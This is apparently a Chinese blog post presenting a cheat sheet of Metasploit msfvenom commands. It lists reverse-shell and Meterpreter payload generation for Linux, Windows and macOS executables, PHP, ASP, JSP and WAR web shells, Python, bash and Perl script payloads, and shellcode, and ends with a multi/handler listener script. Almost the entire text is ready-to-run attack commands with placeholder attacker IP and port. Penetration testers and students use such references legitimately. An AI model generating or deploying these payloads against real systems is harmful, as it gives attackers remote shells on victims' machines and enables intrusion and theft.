前言
在metasploit中,往往一个最有用的(初学者低估)功能模块是Metasploit的msfpayload模块。这个模块可以创建多个有效载荷,它可以帮助在任何情况下给你一个shell。对于每一个这些有效载荷可以进入msfconsole选择合理的利用,运行“设置有效载荷的必要选项(LHOST,LPORT,等),执行并等待要运行的有效负载。下面我们开始今天的介绍吧,我觉得每一个喜欢metasploit的人都应该保存这篇文章。
列出所有的payload
msfvenom -l编译的可执行程序
linux
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elfwindows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exeMac
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.machoWeb Payloads
php
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.phpASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp
jsp
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jspWAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.warScripting Payloads
python
msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pybash
msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.shperl
msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.plShellcode
下面是shellcode生成的各种方法,针对了不同的平台
Linux Based Shellcode
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>Windows Based Shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>Mac Based Shellcode
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>Handlers
Msfvenom可以将输出的代码是能够被切割和粘贴在对应的编程语言中直接使用,下面是设置的脚本
use exploit/multi/handler
set PAYLOAD <Payload name>
set LHOST <LHOST value>
set LPORT <LPORT value>
set ExitOnSession false
exploit -j -z使用上面的脚本,我们可以很简单的开始使用metasploit了。

本文详细介绍了如何使用Metasploit的msfpayload模块来生成多种类型的有效载荷,包括针对不同操作系统的可执行文件及Web Payloads,并提供了具体的命令示例。
1837

被折叠的 条评论
为什么被折叠?



